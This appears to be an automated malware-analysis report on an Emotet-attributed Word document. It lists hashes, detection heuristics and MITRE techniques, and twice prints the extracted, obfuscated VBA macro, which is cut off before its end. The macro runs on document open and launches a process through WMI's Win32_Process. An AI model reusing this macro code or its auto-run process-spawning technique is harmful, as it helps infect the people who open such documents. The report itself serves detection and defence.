Emotet Office (OLE) malware analysis — malicious · fe7b7ee9e2a23a0e

MALICIOUS

Office (OLE)

133.6 KB Created: 2019-05-28 19:56:00 Authoring application: Microsoft Office Word First seen: 2019-09-30

MD5: 6ffb1d9b0deca24bc4746602b5289d0a SHA-1: 5ab057c567f369e92bb5b61411b1cf3da0b57e29 SHA-256: fe7b7ee9e2a23a0ec09a5eee876eaca33e3ff136b92e8d81cb646c1a25f41ae7

222 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an autoopen subroutine, which is a common execution vector for Emotet. The macro utilizes CreateObject, a known technique for launching malicious payloads. ClamAV also identifies this as Emotet, increasing confidence in the family attribution.

Heuristics 7

ClamAV: Doc.Downloader.Emotet-10001946-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-10001946-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5354 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5354 bytes
SHA-256: `354f2ad3cf51e6404b8b5669d00c1cef284ad791fa2583371268460a74f92742`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "cPN0C9, 0, 0, MSForms, ComboBox" Attribute VB_Control = "HwWnJoB, 1, 1, MSForms, ComboBox" Attribute VB_Control = "ooRZPMQc, 2, 2, MSForms, ComboBox" Sub _ autoopen( _ ) Debug.Print "F4Bmz5" + ("k_kZjZ") + "pWpLirDj" + "lwDLEVk2" + "Rw3P8nu" + ("AIk6U0" + ("Pja1c6")) Debug.Print "NGj6Oz" + ("GdAiZO") + "RiriI2uN" + "OUpw43" + ("jhNwzL" + "p29nqE") Dl1S8chn Debug.Print "l0IsfK" + ("CkZUldF") + "bUQO1p9" + "OlmccPri" + "r8s26q" + ("VUiIXp" + ("AQ95ULz")) Debug.Print "n3mIKnC_" + ("dzdWj0Wi") + "GO9JEOb" + "wpHI9Jw" + ("MrfJk4" + "c6Z69nQ") End Sub Attribute VB_Name = "CcZuoSzj" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "D814ZY" Attribute VB_Name = "U3v5jq" Attribute VB_Name = "BmNM7w" Attribute VB_Name = "zXjIi4q" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "VWdbl2P" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "bXNaTur" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "s6k2vPl" Function Dl1S8chn() aDuvwR = ThisDocument.HwWnJoB + ThisDocument.ooRZPMQc + ThisDocument.cPN0C9 Debug.Print "ANPP5aiB" + ("P6cEjtL") + "wvjlph" + "sAzTX2I2" + "rP_9Y1fl" + ("dlTzm9wK" + ("itojqBr")) Debug.Print "DUOh8WLA" + ("mGDDTRQ") + "kZF0aWLH" + "OXJOqZm" + ("Sbb8zw" + "cpVRaUs") ldoasE = "win" Debug.Print "DrLFVH" + ("X27JOO") + "UTvVZGN" + "KibmzoE" + "EuFbidb" + ("L49a8wO9" + ("q59d1i")) Debug.Print "RspN323" + ("R8wR63L") + "hzhoX1u" + "XHQQ9Zz" + ("NABHiwU5" + "z6CziW") E1wA8rr = ldoasE + "mgmts:Win" + "32_Process" Debug.Print "A4JwBraL" + ("mcjibd") + "zNpz1X" + "YR0z8U0" + "i18GFqo" + ("nnjXEcj" + ("JLNCzTo")) Debug.Print "KDWZd1" + ("j3A4hBoV") + "sGMhT76w" + "fCnd3h" + ("GWKqTS" + "AioJjrL") aMvuMT34(E1wA8rr).Create# aDuvwR, zpvbfp, D7McZzH, IlOhAAjj Debug.Print "YOc1jvnc" + ("Gai1NLu") + "M4fXoQO" + "vjku_Pd4" + "zPlwwn" + ("s8AWqLjG" + ("swjR92ha")) Debug.Print "VTWVIbA" + ("Euv8ZW2") + "sYN5VfB" + "lRuRWwUb" + ("iOOLacz" + "tJ6GF9") End Function Attribute VB_Name = "b03T4t" Function D7McZzH() Debug.Print "alpcEO" + ("zHTL6fYw") + "jUpq2Cz" + "F02WZ0" + "OdwH4TQ" + ("wMJ9NkXw" + ("f1vmqN")) Debug.Print "nJv5Mn_" + ("RRwBYCB") + "jK5Zdlk" + "jj2I5w4j" + ("C_j9FO" + "ARNzthE") ldoasE = SqKUj9T + "win" + KXBJ3i9 Debug.Print "GmiUbk" + ("NFoBzk_") + "zjw_WDO" + "kGwVphr" + "nLYuqHK" + ("owWjAFK" + ("OTwiTn")) Debug.Print "sz6bGVmO" + ("MP5rziob") + "HFtL9X" + "iN4v3wQY" + ("jbvUwL7c" + "YS63tqt") E1wA8rr = ldoasE + "mgmts:Win" + Yu6snCCd + "32_Process" + "Startup" Debug.Print "K_7HRJz" + ("GkZwc6q") + "C5w9MCz" + "PbzXAGA" + "L6fGSS" + ("tHpftZ4w" + ("hOw5Vj")) Debug.Print "bmvjSwl" + ("ZC8ljIa") + "FEkB6jU" + "hZVk0hw" + ("BTz35A" + "ouiIGXt") Set D7McZzH = aMvuMT34(E1wA8rr) Debug.Print "Vq8LaS" + ("aZAdYk") + "pN3MCEQ" + "RCwCXrb1" + "UiQhZXd" + ("k6wZCiYH" + ("HUZPUE")) Debug. ... (truncated)

SHA-256: 354f2ad3cf51e6404b8b5669d00c1cef284ad791fa2583371268460a74f92742

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "cPN0C9, 0, 0, MSForms, ComboBox"
Attribute VB_Control = "HwWnJoB, 1, 1, MSForms, ComboBox"
Attribute VB_Control = "ooRZPMQc, 2, 2, MSForms, ComboBox"
Sub _
autoopen( _
)
   Debug.Print "F4Bmz5" + ("k_kZjZ") + "pWpLirDj" + "lwDLEVk2" + "Rw3P8nu" + ("AIk6U0" + ("Pja1c6"))
Debug.Print "NGj6Oz" + ("GdAiZO") + "RiriI2uN" + "OUpw43" + ("jhNwzL" + "p29nqE")
Dl1S8chn
   Debug.Print "l0IsfK" + ("CkZUldF") + "bUQO1p9" + "OlmccPri" + "r8s26q" + ("VUiIXp" + ("AQ95ULz"))
Debug.Print "n3mIKnC_" + ("dzdWj0Wi") + "GO9JEOb" + "wpHI9Jw" + ("MrfJk4" + "c6Z69nQ")
End Sub


Attribute VB_Name = "CcZuoSzj"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "D814ZY"

Attribute VB_Name = "U3v5jq"

Attribute VB_Name = "BmNM7w"

Attribute VB_Name = "zXjIi4q"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "VWdbl2P"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "bXNaTur"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "s6k2vPl"
Function Dl1S8chn()
aDuvwR = ThisDocument.HwWnJoB + ThisDocument.ooRZPMQc + ThisDocument.cPN0C9
   Debug.Print "ANPP5aiB" + ("P6cEjtL") + "wvjlph" + "sAzTX2I2" + "rP_9Y1fl" + ("dlTzm9wK" + ("itojqBr"))
Debug.Print "DUOh8WLA" + ("mGDDTRQ") + "kZF0aWLH" + "OXJOqZm" + ("Sbb8zw" + "cpVRaUs")
ldoasE = "win"
   Debug.Print "DrLFVH" + ("X27JOO") + "UTvVZGN" + "KibmzoE" + "EuFbidb" + ("L49a8wO9" + ("q59d1i"))
Debug.Print "RspN323" + ("R8wR63L") + "hzhoX1u" + "XHQQ9Zz" + ("NABHiwU5" + "z6CziW")
E1wA8rr = ldoasE + "mgmts:Win" + "32_Process"
   Debug.Print "A4JwBraL" + ("mcjibd") + "zNpz1X" + "YR0z8U0" + "i18GFqo" + ("nnjXEcj" + ("JLNCzTo"))
Debug.Print "KDWZd1" + ("j3A4hBoV") + "sGMhT76w" + "fCnd3h" + ("GWKqTS" + "AioJjrL")
aMvuMT34(E1wA8rr).Create# aDuvwR, zpvbfp, D7McZzH, IlOhAAjj
   Debug.Print "YOc1jvnc" + ("Gai1NLu") + "M4fXoQO" + "vjku_Pd4" + "zPlwwn" + ("s8AWqLjG" + ("swjR92ha"))
Debug.Print "VTWVIbA" + ("Euv8ZW2") + "sYN5VfB" + "lRuRWwUb" + ("iOOLacz" + "tJ6GF9")
End Function

Attribute VB_Name = "b03T4t"
Function D7McZzH()
   Debug.Print "alpcEO" + ("zHTL6fYw") + "jUpq2Cz" + "F02WZ0" + "OdwH4TQ" + ("wMJ9NkXw" + ("f1vmqN"))
Debug.Print "nJv5Mn_" + ("RRwBYCB") + "jK5Zdlk" + "jj2I5w4j" + ("C_j9FO" + "ARNzthE")
ldoasE = SqKUj9T + "win" + KXBJ3i9
   Debug.Print "GmiUbk" + ("NFoBzk_") + "zjw_WDO" + "kGwVphr" + "nLYuqHK" + ("owWjAFK" + ("OTwiTn"))
Debug.Print "sz6bGVmO" + ("MP5rziob") + "HFtL9X" + "iN4v3wQY" + ("jbvUwL7c" + "YS63tqt")
E1wA8rr = ldoasE + "mgmts:Win" + Yu6snCCd + "32_Process" + "Startup"
   Debug.Print "K_7HRJz" + ("GkZwc6q") + "C5w9MCz" + "PbzXAGA" + "L6fGSS" + ("tHpftZ4w" + ("hOw5Vj"))
Debug.Print "bmvjSwl" + ("ZC8ljIa") + "FEkB6jU" + "hZVk0hw" + ("BTz35A" + "ouiIGXt")
Set D7McZzH = aMvuMT34(E1wA8rr)
   Debug.Print "Vq8LaS" + ("aZAdYk") + "pN3MCEQ" + "RCwCXrb1" + "UiQhZXd" + ("k6wZCiYH" + ("HUZPUE"))
Debug.
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.